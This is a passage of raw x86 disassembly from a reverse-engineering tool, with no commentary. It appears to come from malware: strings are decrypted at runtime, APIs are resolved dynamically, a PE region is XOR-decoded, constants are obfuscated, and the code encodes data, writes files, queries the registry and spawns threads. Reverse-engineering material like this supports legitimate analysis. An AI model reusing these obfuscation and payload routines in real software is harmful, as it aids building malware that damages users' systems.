; =============== S U B R O U T I N E =======================================
sub_41B2E4 proc near ; CODE XREF: .data:00423032�p
push edi
push 10013721h
call sub_4228CE
pop ecx
push eax
call dword ptr ds:1000E5E8h
mov ds:100121E8h, eax
test eax, eax
jnz short loc_41B317
push 10013711h
call sub_4228CE
pop ecx
push eax
call dword ptr ds:1000F244h
mov ds:100121E8h, eax
loc_41B317: ; CODE XREF: sub_41B2E4+1A�j
push 100136FFh
call sub_4228CE
push eax
push dword ptr ds:100121E8h
call dword ptr ds:1000E1F8h
mov ds:1000C044h, eax
push 100136EEh
call sub_4228CE
push eax
push dword ptr ds:100121E8h
call dword ptr ds:1000E1F8h
mov ds:10011BA0h, eax
push 100136DEh
call sub_4228CE
push eax
push dword ptr ds:100121E8h
call dword ptr ds:1000E1F8h
mov ds:10011BB0h, eax
push 100136CFh
call sub_4228CE
push eax
push dword ptr ds:100121E8h
call dword ptr ds:1000E1F8h
mov ds:1000C038h, eax
push 100136BFh
call sub_4228CE
add esp, 14h
push eax
push dword ptr ds:100121E8h
call dword ptr ds:1000E1F8h
mov ds:1000F254h, eax
pop edi
retn
sub_41B2E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B3A8 proc near ; CODE XREF: sub_41C68E+D1�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 10012250h
push 10012210h
push [ebp+arg_4]
push [ebp+arg_0]
call sub_424505
pop ebp
retn
sub_41B3A8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B3C2 proc near ; CODE XREF: sub_41B939+91�p
var_1AC = dword ptr -1ACh
var_1A8 = byte ptr -1A8h
var_1A4 = dword ptr -1A4h
var_1A0 = dword ptr -1A0h
var_19C = byte ptr -19Ch
var_198 = dword ptr -198h
var_193 = dword ptr -193h
var_18F = dword ptr -18Fh
var_18B = dword ptr -18Bh
var_187 = dword ptr -187h
var_183 = dword ptr -183h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1ACh
push esi
push edi
mov edi, [ebp+arg_0]
mov byte ptr [edi], 0
mov [ebp+var_193], 94h
lea eax, [ebp+var_193]
push eax
call dword ptr ds:10011B98h
cmp [ebp+var_183], 1
jnz short loc_41B408
push 100136B9h
call sub_4228CE
push eax
push edi
call dword ptr ds:1000C020h
add esp, 0Ch
loc_41B408: ; CODE XREF: sub_41B3C2+2F�j
cmp [ebp+var_183], 2
jnz short loc_41B426
push 100136B3h
call sub_4228CE
push eax
push edi
call dword ptr ds:10011634h
add esp, 0Ch
loc_41B426: ; CODE XREF: sub_41B3C2+4D�j
push 100136A7h
call sub_4228CE
push [ebp+var_187]
push [ebp+var_18B]
push [ebp+var_18F]
push eax
lea esi, [ebp+var_FF]
push esi
call dword ptr ds:10011634h
lea eax, [ebp+var_FF]
push eax
push edi
call dword ptr ds:1000C020h
push 100136A0h
call sub_4228CE
mov esi, ds:100121A0h
sub esi, 6
push esi
push 0
lea esi, [ebp+var_19C]
push esi
lea esi, [ebp+var_19C]
push esi
lea esi, [ebp+var_198]
push esi
push 0FFh
lea esi, [ebp+var_FF]
push esi
push eax
call dword ptr ds:10011614h
push 10013698h
call sub_4228CE
push [ebp+var_198]
push eax
lea esi, [ebp+var_FF]
push esi
call dword ptr ds:10011634h
lea eax, [ebp+var_FF]
push eax
push edi
call dword ptr ds:1000C020h
push 0FFh
lea eax, [ebp+var_FF]
push eax
mov eax, ds:1001218Ch
add eax, 2
push eax
push 400h
call dword ptr ds:1000E5F4h
lea eax, [ebp+var_FF]
push eax
push edi
call dword ptr ds:1000C020h
push 10013693h
call sub_4228CE
push eax
push edi
call dword ptr ds:1000C020h
mov [ebp+var_1A0], 0FFh
push 10013666h
call sub_4228CE
mov [ebp+var_1AC], eax
push 10013659h
call sub_4228CE
lea esi, [ebp+var_1A8]
push esi
lea esi, [ebp+var_1A0]
push esi
lea esi, [ebp+var_FF]
push esi
push eax
mov esi, [ebp+var_1AC]
push esi
push 80000002h
call sub_4213C8
add esp, 70h
mov [ebp+var_1A4], eax
mov eax, ds:10012190h
add eax, ds:100121ACh
sub eax, 6
cmp [ebp+var_1A4], eax
jnz short loc_41B583
lea eax, [ebp+var_FF]
push eax
push edi
call dword ptr ds:1000C020h
add esp, 8
loc_41B583: ; CODE XREF: sub_41B3C2+1AE�j
pop edi
pop esi
leave
retn
sub_41B3C2 endp
; ---------------------------------------------------------------------------
db 0B8h
dd 80004001h
db 0C2h, 10h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B58F proc near ; CODE XREF: sub_4232A3+35E�p
; sub_4232A3+3E5�p
var_16C = byte ptr -16Ch
var_168 = byte ptr -168h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 16Ch
push ebx
push esi
push edi
push 104h
lea eax, [ebp+var_104]
push eax
call dword ptr ds:1000E5FCh
lea eax, [ebp+var_168]
push eax
call sub_41C3F2
push 10013654h
call sub_4228CE
push eax
lea esi, [ebp+var_104]
push esi
call dword ptr ds:1000C020h
lea eax, [ebp+var_168]
push eax
lea eax, [ebp+var_104]
push eax
call dword ptr ds:1000C020h
push 1001364Ch
call sub_4228CE
push eax
lea esi, [ebp+var_104]
push esi
call dword ptr ds:1000C020h
add esp, 24h
push 0
push 80h
push 4
push 0
mov eax, ds:100120C0h
add eax, ds:100121C0h
sub eax, 4
push eax
push 40000000h
lea eax, [ebp+var_104]
push eax
call dword ptr ds:10011788h
mov edi, eax
push 0
push 0
push [ebp+arg_4]
push edi
call dword ptr ds:10011B9Ch
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_41B644: ; CODE XREF: sub_41B58F+BA�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41B644
mov esi, eax
push 0
lea ebx, [ebp+var_16C]
push ebx
push esi
push [ebp+arg_0]
push edi
call dword ptr ds:10011B8Ch
push edi
call dword ptr ds:10010650h
pop edi
pop esi
pop ebx
leave
retn
sub_41B58F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B66D proc near ; CODE XREF: .data:0041E8A5�p
; .data:0041E974�p
var_10003 = dword ptr -10003h
var_FFFF = byte ptr -0FFFFh
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
mov eax, 10004h
call sub_424F4D
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
lea edi, ds:1000F260h
cmp [ebp+arg_4], 43h
jnz short loc_41B692
lea edi, ds:1000E0F0h
loc_41B692: ; CODE XREF: sub_41B66D+1D�j
push 0
push 80h
push 3
push 0
push 3
push 0C0000000h
push edi
call dword ptr ds:10011788h
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_41B73B
push 0
push 0
push esi
push edi
call dword ptr ds:10011B9Ch
push 0
lea eax, [ebp+var_4]
push eax
push 0FFFFh
lea eax, [ebp+var_10003]
push eax
push edi
call dword ptr ds:1000C028h
lea ecx, [ebp+var_FFFF]
or eax, 0FFFFFFFFh
loc_41B6E4: ; CODE XREF: sub_41B66D+7C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41B6E4
mov edx, ds:100120C4h
add edx, 1
mov ebx, eax
add ebx, edx
mov [ebp+var_4], ebx
mov ebx, ds:10012158h
mov edx, [ebp+var_4]
mov [ebp+ebx*4+var_10003], edx
push 0
push 0
push esi
push edi
call dword ptr ds:10011B9Ch
push 0
lea eax, [ebp+var_4]
push eax
mov eax, ds:10012178h
add eax, 1
push eax
lea eax, [ebp+var_10003]
push eax
push edi
call dword ptr ds:10011B8Ch
push edi
call dword ptr ds:10010650h
loc_41B73B: ; CODE XREF: sub_41B66D+43�j
pop edi
pop esi
pop ebx
leave
retn
sub_41B66D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B740 proc near ; CODE XREF: .data:004231FC�p
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov eax, [ebp+arg_0]
mov esi, [eax+3Ch]
mov edi, esi
add edi, eax
mov eax, [edi+28h]
mov edx, [ebp+arg_0]
lea esi, [eax+edx+0Dh]
movzx eax, byte ptr [esi]
xor eax, 4Dh
mov [ebp+var_1], al
movzx eax, byte ptr [esi+1]
movsx edx, word ptr ds:100120C8h
mov ecx, ds:100121B4h
lea edx, [edx+ecx+1F8h]
mov ebx, eax
imul ebx, edx
movsx eax, word ptr ds:10012168h
mov edi, eax
add edi, ds:100120F8h
sub edi, 8
jmp short loc_41B7A3
; ---------------------------------------------------------------------------
loc_41B795: ; CODE XREF: sub_41B740+65�j
movzx eax, byte ptr [esi+edi]
movzx edx, [ebp+var_1]
xor eax, edx
mov [esi+edi], al
inc edi
loc_41B7A3: ; CODE XREF: sub_41B740+53�j
cmp edi, ebx
jb short loc_41B795
mov eax, [ebp+arg_4]
mov [eax], ebx
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_41B740 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B7B4 proc near ; CODE XREF: .data:0041B022�p
var_7 = byte ptr -7
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
mov ebx, [ebp+arg_4]
mov esi, [ebp+arg_8]
mov eax, ebx
add eax, 2
mov ecx, 3
mov edx, 0AAAAAAABh
mul edx
shr edx, 1
mov [ebp+var_4], edx
mov edi, edx
shl edi, 2
mov edx, [ebp+arg_C]
dec edx
cmp edi, edx
jbe short loc_41B824
xor eax, eax
jmp loc_41B8CE
; ---------------------------------------------------------------------------
loc_41B7EC: ; CODE XREF: sub_41B7B4+80�j
push esi
push [ebp+arg_0]
call sub_41C28D
add esp, 8
mov eax, ds:10012188h
add eax, 3
sub ebx, eax
movsx eax, word ptr ds:100120D0h
mov edx, ds:10012118h
lea eax, [eax+edx+2]
add eax, [ebp+arg_0]
mov [ebp+arg_0], eax
mov eax, ds:10012140h
sub eax, 4
lea esi, [esi+eax]
loc_41B824: ; CODE XREF: sub_41B7B4+2F�j
mov eax, ds:1001217Ch
add eax, ds:100120ECh
sub eax, 8
cmp ebx, eax
jnb short loc_41B7EC
movsx eax, word ptr ds:1001216Ch
sub eax, 4
cmp ebx, eax
jbe short loc_41B8B1
push 3
mov eax, ds:10012130h
add eax, ds:1001218Ch
dec eax
push eax
lea eax, [ebp+var_7]
push eax
call dword ptr ds:10010640h
push ebx
push [ebp+arg_0]
lea eax, [ebp+var_7]
push eax
call dword ptr ds:10010634h
push esi
lea eax, [ebp+var_7]
push eax
call sub_41C28D
add esp, 20h
mov eax, ds:1001214Ch
add eax, ds:10012184h
sub eax, 9
mov byte ptr [esi+eax], 3Dh
movsx eax, word ptr ds:100120E0h
inc eax
cmp ebx, eax
jnz short loc_41B8A8
mov eax, ds:10012104h
add eax, ds:100120D4h
sub eax, 2
mov byte ptr [esi+eax], 3Dh
loc_41B8A8: ; CODE XREF: sub_41B7B4+E0�j
mov eax, ds:100121C0h
inc eax
lea esi, [esi+eax]
loc_41B8B1: ; CODE XREF: sub_41B7B4+8E�j
mov eax, ds:10012134h
add eax, ds:10012144h
sub eax, 8
mov edx, ds:10012104h
sub edx, 3
mov [esi+eax], dl
xor eax, eax
inc eax
loc_41B8CE: ; CODE XREF: sub_41B7B4+33�j
pop edi
pop esi
pop ebx
leave
retn
sub_41B7B4 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov edi, [ebp+8]
push 100071E7h
push dword ptr fs:0
mov fs:0, esp
push 10013644h
call sub_4228CE
push dword ptr [edi]
push eax
lea esi, [ebp-0Ah]
push esi
call dword ptr ds:10011634h
add esp, 10h
loc_41B909: ; CODE XREF: .data:0041B931�j
push 0
push dword ptr [edi]
lea eax, [ebp-0Ah]
push eax
call sub_423CF4
mov eax, ds:10012098h
movsx edx, word ptr ds:10012170h
add eax, edx
sub eax, 0Fh
push eax
call dword ptr ds:10011630h
add esp, 10h
jmp short loc_41B909
; ---------------------------------------------------------------------------
db 5Fh
dd 4C2C95Eh
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B939 proc near ; CODE XREF: .data:00423256�p
var_209 = byte ptr -209h
var_208 = byte ptr -208h
var_204 = byte ptr -204h
var_1FE = byte ptr -1FEh
var_107 = byte ptr -107h
var_102 = byte ptr -102h
var_FF = byte ptr -0FFh
var_FE = byte ptr -0FEh
push ebp
mov ebp, esp
sub esp, 20Ch
push edi
push 0FFh
lea eax, [ebp+var_1FE]
push eax
call dword ptr ds:1000E5FCh
push 10013631h
call sub_4228CE
movsx edi, word ptr ds:10012148h
sub edi, 2
push edi
lea edi, [ebp+var_1FE]
push edi
push eax
push 1000E0F0h
call dword ptr ds:10011634h
push 1001361Eh
call sub_4228CE
mov edi, ds:100120F0h
sub edi, 3
push edi
lea edi, [ebp+var_1FE]
push edi
push eax
push 1000F260h
call dword ptr ds:10011634h
lea eax, ds:10001A99h
mov ds:1001162Ch, eax
lea eax, ds:10001A99h
mov ds:1000C04Ch, eax
lea eax, ds:1000987Ch
mov ds:10011774h, eax
push 1000D020h
call sub_41B3C2
mov eax, ds:100121ACh
add eax, 6
push eax
push 1000F230h
call sub_422857
lea eax, ds:1000AC06h
mov ds:1000F228h, eax
lea eax, ds:10004E0Fh
mov ds:1000EA30h, eax
lea eax, ds:1000E0F0h
mov ds:1001063Ch, eax
lea eax, ds:1000F260h
mov ds:1000C018h, eax
lea eax, ds:10011670h
mov ds:100122B0h, eax
lea eax, [ebp+var_204]
push eax
mov eax, ds:100120ACh
sub eax, 3
push eax
push 0
push 10007914h
mov eax, ds:100120F8h
add eax, ds:10012104h
sub eax, 5
push eax
push 0
call dword ptr ds:10011B90h
push eax
call dword ptr ds:10010650h
lea eax, [ebp+var_208]
push eax
mov eax, ds:10012198h
mov edx, ds:10012184h
add edx, eax
sub edx, 0Eh
push edx
push 0
push 10003256h
movsx edx, word ptr ds:100120E8h
add edx, eax
lea eax, [edx-0Dh]
push eax
push 0
call dword ptr ds:10011B90h
push eax
call dword ptr ds:10010650h
mov eax, ds:10012174h
inc eax
movsx edx, word ptr ds:100120E0h
add eax, edx
mov ds:1000E61Ch, eax
movsx eax, word ptr ds:100120BCh
movsx edx, word ptr ds:10012128h
add eax, edx
sub eax, 8
push eax
lea eax, [ebp+var_FF]
push eax
call sub_41B1B9
add esp, 3Ch
mov eax, ds:100120A4h
add eax, ds:10012124h
cmp [ebp+eax+var_102], 64h
jnz short loc_41BB12
movsx eax, [ebp+var_FE]
mov edx, ds:100120B8h
add edx, 1Ch
add edx, ds:100121A4h
sub eax, edx
mov [ebp+var_209], al
movzx eax, [ebp+var_209]
push eax
push 0
call sub_4223D9
add esp, 8
mov eax, ds:100120B4h
sub eax, 8
mov ds:1000E61Ch, eax
loc_41BB12: ; CODE XREF: sub_41B939+19A�j
movsx eax, word ptr ds:10012170h
add eax, ds:10012164h
cmp [ebp+eax+var_107], 67h
jnz short loc_41BB82
mov eax, ds:10012188h
add eax, 7
add eax, ds:100120ACh
movsx edx, word ptr ds:100121BCh
add edx, ds:100121CCh
sub edx, 0Ah
mov [ebp+eax+var_FF], dl
lea eax, [ebp+var_FE]
push eax
call dword ptr ds:1000C054h
mov [ebp-20Ch], eax
push eax
push 10011670h
call sub_41E5D9
add esp, 0Ch
mov eax, ds:1001210Ch
add eax, ds:10012174h
sub eax, 10h
mov ds:1000E61Ch, eax
loc_41BB82: ; CODE XREF: sub_41B939+1EE�j
pop edi
leave
retn
sub_41B939 endp
; ---------------------------------------------------------------------------
db 0B8h, 1, 40h
dd 10C28000h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BB8D proc near ; CODE XREF: sub_423996+E�p
; sub_423996+1DB�p
var_10088 = dword ptr -10088h
var_10084 = dword ptr -10084h
var_10080 = dword ptr -10080h
var_1007C = dword ptr -1007Ch
var_10078 = word ptr -10078h
var_10070 = dword ptr -10070h
var_10068 = dword ptr -10068h
var_10064 = dword ptr -10064h
var_10060 = dword ptr -10060h
var_10059 = byte ptr -10059h
var_10058 = dword ptr -10058h
var_10054 = dword ptr -10054h
var_10050 = dword ptr -10050h
var_1004C = dword ptr -1004Ch
var_10048 = dword ptr -10048h
var_10043 = byte ptr -10043h
var_44 = dword ptr -44h
var_40 = word ptr -40h
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 10088h
call sub_424F4D
push ebx
push esi
push edi
mov [ebp+var_40], 8
push 10013610h
call sub_41F3E4
pop ecx
push eax
call dword ptr ds:1000C044h
mov [ebp+var_38], eax
lea eax, [ebp+var_2C]
push eax
lea esi, [ebp+var_40]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+arg_0]
push edi
mov edi, [edi]
call dword ptr [edi+30h]
mov ebx, eax
mov eax, ds:100120F0h
sub eax, 4
cmp ebx, eax
jz short loc_41BBE9
xor eax, eax
jmp loc_41C22D
; ---------------------------------------------------------------------------
loc_41BBE9: ; CODE XREF: sub_41BB8D+53�j
lea eax, [ebp+var_24]
push eax
push 1001391Ch
mov eax, [ebp+var_2C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word ptr ds:10012090h
dec eax
cmp ebx, eax
jnz loc_41C222
lea eax, [ebp+var_28]
push eax
mov eax, [ebp+var_24]
push eax
mov edi, [eax]
call dword ptr [edi+24h]
mov ebx, eax
movsx eax, word ptr ds:10012100h
movsx edx, word ptr ds:100120DCh
add eax, edx
sub eax, 0Fh
cmp ebx, eax
jnz loc_41C219
and [ebp+var_44], 0
movsx eax, word ptr ds:10012100h
sub eax, 9
mov [ebp+var_1C], eax
jmp loc_41C20D
; ---------------------------------------------------------------------------
loc_41BC51: ; CODE XREF: sub_41BB8D+686�j
mov [ebp+var_18], 2
mov eax, [ebp+var_1C]
mov [ebp+var_10], eax
lea eax, [ebp+var_4]
push eax
lea esi, [ebp+var_18]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_18]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_24]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
movsx eax, word ptr ds:100120DCh
add eax, ds:100120A0h
sub eax, 0Ah
cmp ebx, eax
jnz loc_41C20A
and [ebp+var_10048], 0
lea eax, [ebp+var_10048]
push eax
push 1001390Ch
mov eax, [ebp+var_4]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word ptr ds:10012170h
sub eax, 8
cmp ebx, eax
jnz loc_41C1E6
cmp [ebp+var_10048], 0
jz loc_41C1E6
lea eax, [ebp+var_20]
push eax
mov eax, [ebp+var_10048]
push eax
mov edi, [eax]
call dword ptr [edi+0F8h]
mov ebx, eax
or ebx, ebx
jnz loc_41C1E6
lea eax, [ebp+var_10043]
push eax
push [ebp+var_20]
call sub_41ADCD
mov eax, ds:100120F0h
sub eax, 3
push eax
push 1000F230h
lea eax, [ebp+var_10043]
push eax
call sub_41DB51
add esp, 14h
movsx edi, word ptr ds:100120D0h
mov esi, ds:10012094h
lea edi, [edi+esi+0FFF9h]
cmp eax, edi
jz loc_41C1E6
cmp [ebp+arg_4], 0
jz short loc_41BD6B
mov eax, [ebp+var_10048]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov eax, [ebp+var_4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
xor eax, eax
inc eax
jmp loc_41C22D
; ---------------------------------------------------------------------------
loc_41BD6B: ; CODE XREF: sub_41BB8D+1BF�j
and [ebp+var_1007C], 0
lea eax, [ebp+var_1007C]
push eax
push 1001393Ch
mov eax, [ebp+var_4]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word ptr ds:10012194h
cmp ebx, eax
jnz loc_41C1E6
mov [ebp+var_10059], 44h
push 10013608h
call sub_4228CE
mov edi, ds:10012174h
movsx esi, word ptr ds:10012100h
add edi, esi
sub edi, 11h
push edi
push eax
lea edi, [ebp+var_10043]
push edi
call sub_41DB51
add esp, 10h
mov esi, ds:100120F8h
add esi, 0FFF4h
movsx edx, word ptr ds:100120F4h
add esi, edx
cmp eax, esi
jz short loc_41BDF0
mov [ebp+var_10059], 43h
loc_41BDF0: ; CODE XREF: sub_41BB8D+25A�j
push 10013600h
call sub_4228CE
mov edi, ds:10012158h
add edi, ds:100120A4h
dec edi
push edi
push eax
lea edi, [ebp+var_10043]
push edi
call sub_41DB51
add esp, 10h
mov esi, ds:1001218Ch
add esi, ds:100121CCh
dec esi
mov edi, eax
add edi, esi
mov [ebp+var_10068], edi
mov [ebp+var_10054], edi
loc_41BE35: ; CODE XREF: sub_41BB8D+2BE�j
mov eax, [ebp+var_10054]
cmp [ebp+eax+var_10043], 26h
jz short loc_41BE4D
inc [ebp+var_10054]
jmp short loc_41BE35
; ---------------------------------------------------------------------------
loc_41BE4D: ; CODE XREF: sub_41BB8D+2B6�j
mov eax, [ebp+var_10054]
mov edx, ds:1001209Ch
add edx, ds:100120A8h
sub edx, 0Bh
mov [ebp+eax+var_10043], dl
mov eax, [ebp+var_10068]
lea eax, [ebp+eax+var_10043]
push eax
call dword ptr ds:1000C054h
mov [ebp+var_10080], eax
push 100135F9h
call sub_4228CE
mov edi, ds:10012184h
mov esi, edi
add esi, edi
mov edi, esi
sub edi, 0Bh
push edi
push eax
lea edi, [ebp+var_10043]
push edi
call sub_41DB51
add esp, 14h
mov esi, ds:1001214Ch
add esi, ds:10012118h
sub esi, 4
mov edi, eax
add edi, esi
mov [ebp+var_10068], edi
mov [ebp+var_10054], edi
loc_41BECC: ; CODE XREF: sub_41BB8D+355�j
mov eax, [ebp+var_10054]
cmp [ebp+eax+var_10043], 26h
jz short loc_41BEE4
inc [ebp+var_10054]
jmp short loc_41BECC
; ---------------------------------------------------------------------------
loc_41BEE4: ; CODE XREF: sub_41BB8D+34D�j
mov eax, [ebp+var_10054]
mov edx, ds:10012158h
add edx, ds:10012174h
sub edx, 9
mov [ebp+eax+var_10043], dl
mov eax, [ebp+var_10068]
lea eax, [ebp+eax+var_10043]
push eax
call dword ptr ds:1000C054h
pop ecx
mov [ebp+var_10060], eax
mov eax, ds:1001212Ch
sub eax, 5
cmp [ebp+var_10080], eax
ja short loc_41BF90
movsx eax, word ptr ds:1001216Ch
sub eax, 4
mov [ebp+var_1004C], eax
jmp short loc_41BF7E
; ---------------------------------------------------------------------------
loc_41BF3D: ; CODE XREF: sub_41BB8D+401�j
mov edi, [ebp+var_1004C]
mov esi, edi
shl esi, 2
cmp dword ptr ds:1000D130h[esi], 0
jz short loc_41BF78
mov edx, [ebp+var_10060]
cmp ds:1000C060h[esi], edx
jnz short loc_41BF78
mov dl, ds:1000E200h[edi]
cmp dl, [ebp+var_10059]
jnz short loc_41BF78
and dword ptr ds:1000D130h[edi*4], 0
loc_41BF78: ; CODE XREF: sub_41BB8D+3C3�j
; sub_41BB8D+3D2�j ...
inc [ebp+var_1004C]
loc_41BF7E: ; CODE XREF: sub_41BB8D+3AE�j
mov eax, ds:100121B0h
add eax, 3E8h
cmp [ebp+var_1004C], eax
jb short loc_41BF3D
loc_41BF90: ; CODE XREF: sub_41BB8D+39C�j
call dword ptr ds:10011770h
mov [ebp+var_10064], eax
movsx eax, word ptr ds:100120B0h
sub eax, 8
mov [ebp+var_10050], eax
jmp short loc_41C00A
; ---------------------------------------------------------------------------
loc_41BFAE: ; CODE XREF: sub_41BB8D+48F�j
mov edi, [ebp+var_10050]
shl edi, 2
cmp dword ptr ds:1000D130h[edi], 0
jz short loc_41C004
mov edi, ds:10010660h[edi]
mov esi, ds:100120D4h
add esi, 0EA5Ch
add esi, ds:10012104h
mov edx, ds:10012098h
add edx, ds:100120F8h
sub edx, 4
imul esi, edx
add edi, esi
cmp edi, [ebp+var_10064]
jnb short loc_41C004
mov edi, [ebp+var_10050]
and dword ptr ds:1000D130h[edi*4], 0
loc_41C004: ; CODE XREF: sub_41BB8D+432�j
; sub_41BB8D+467�j
inc [ebp+var_10050]
loc_41C00A: ; CODE XREF: sub_41BB8D+41F�j
movsx eax, word ptr ds:100120C8h
add eax, 3E1h
cmp [ebp+var_10050], eax
jb short loc_41BFAE
movsx eax, word ptr ds:100120DCh
mov edx, eax
add edx, eax
mov eax, edx
sub eax, 0Ch
mov [ebp+var_10058], eax
jmp short loc_41C04C
; ---------------------------------------------------------------------------
loc_41C036: ; CODE XREF: sub_41BB8D+4D1�j
mov edi, [ebp+var_10058]
cmp dword ptr ds:1000D130h[edi*4], 0
jz short loc_41C060
inc [ebp+var_10058]
loc_41C04C: ; CODE XREF: sub_41BB8D+4A7�j
mov eax, ds:100120C0h
lea eax, [eax+eax+3E6h]
cmp [ebp+var_10058], eax
jb short loc_41C036
loc_41C060: ; CODE XREF: sub_41BB8D+4B7�j
mov edi, [ebp+var_10058]
mov esi, [ebp+var_10060]
mov ds:1000C060h[edi*4], esi
mov eax, edi
mov dl, [ebp+var_10059]
mov ds:1000E200h[eax], dl
mov eax, ds:100121ACh
sub eax, 4
cmp [ebp+var_10080], eax
jbe loc_41C136
movsx esi, word ptr ds:10012148h
mov edx, ds:1001209Ch
lea esi, [esi+edx+0FFF4h]
mov ds:1000EA50h[edi*2], si
movsx eax, word ptr ds:1001219Ch
sub eax, 6
mov [ebp+var_10088], eax
jmp short loc_41C122
; ---------------------------------------------------------------------------
loc_41C0C4: ; CODE XREF: sub_41BB8D+5A5�j
mov edi, [ebp+var_10088]
mov esi, edi
shl esi, 2
cmp dword ptr ds:1000D130h[esi], 0
jz short loc_41C11C
movzx edx, word ptr ds:1000EA50h[edi*2]
movsx ecx, word ptr ds:10012090h
add ecx, 0FFFEh
cmp edx, ecx
jz short loc_41C11C
mov edx, [ebp+var_10060]
cmp ds:1000C060h[esi], edx
jnz short loc_41C11C
mov dl, ds:1000E200h[edi]
cmp dl, [ebp+var_10059]
jnz short loc_41C11C
lea edi, ds:1000EA50h[edi*2]
inc word ptr [edi]
jmp short loc_41C14D
; ---------------------------------------------------------------------------
loc_41C11C: ; CODE XREF: sub_41BB8D+54A�j
; sub_41BB8D+563�j ...
inc [ebp+var_10088]
loc_41C122: ; CODE XREF: sub_41BB8D+535�j
mov eax, ds:100120FCh
add eax, 3E1h
cmp [ebp+var_10088], eax
jb short loc_41C0C4
jmp short loc_41C14D
; ---------------------------------------------------------------------------
loc_41C136: ; CODE XREF: sub_41BB8D+503�j
mov edi, [ebp+var_10058]
mov esi, ds:100120FCh
sub esi, 6
mov ds:1000EA50h[edi*2], si
loc_41C14D: ; CODE XREF: sub_41BB8D+58D�j
; sub_41BB8D+5A7�j
call dword ptr ds:10011770h
mov edi, [ebp+var_10058]
mov ds:10010660h[edi*4], eax
lea esi, ds:10012294h
mov ds:1000D130h[edi*4], esi
mov edi, [ebp+var_10058]
lea edi, ds:1000D130h[edi*4]
mov [ebp+var_10084], edi
mov eax, edi
push eax
mov esi, [eax]
call dword ptr [esi+4]
mov [ebp+var_10078], 9
mov edi, [ebp+var_10058]
lea edi, ds:1000D130h[edi*4]
mov [ebp+var_10070], edi
lea esi, [ebp+var_10078]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_1007C]
push edi
mov edi, [edi]
call dword ptr [edi+0A4h]
mov ebx, eax
inc [ebp+var_10058]
lea eax, [ebp+var_10078]
push eax
call dword ptr ds:10011BB0h
mov eax, [ebp+var_1007C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41C1E6: ; CODE XREF: sub_41BB8D+143�j
; sub_41BB8D+150�j ...
cmp [ebp+var_10048], 0
jz short loc_41C1FB
mov eax, [ebp+var_10048]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41C1FB: ; CODE XREF: sub_41BB8D+660�j
cmp [ebp+var_4], 0
jz short loc_41C20A
mov eax, [ebp+var_4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41C20A: ; CODE XREF: sub_41BB8D+10F�j
; sub_41BB8D+672�j
inc [ebp+var_1C]
loc_41C20D: ; CODE XREF: sub_41BB8D+BF�j
mov eax, [ebp+var_28]
cmp [ebp+var_1C], eax
jb loc_41BC51
loc_41C219: ; CODE XREF: sub_41BB8D+A8�j
mov eax, [ebp+var_24]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41C222: ; CODE XREF: sub_41BB8D+7E�j
mov eax, [ebp+var_2C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
xor eax, eax
loc_41C22D: ; CODE XREF: sub_41BB8D+57�j
; sub_41BB8D+1D9�j
pop edi
pop esi
pop ebx
leave
retn
sub_41BB8D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C232 proc near ; CODE XREF: sub_41A748+2�p
; sub_41A748+9�p
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 104h
push edi
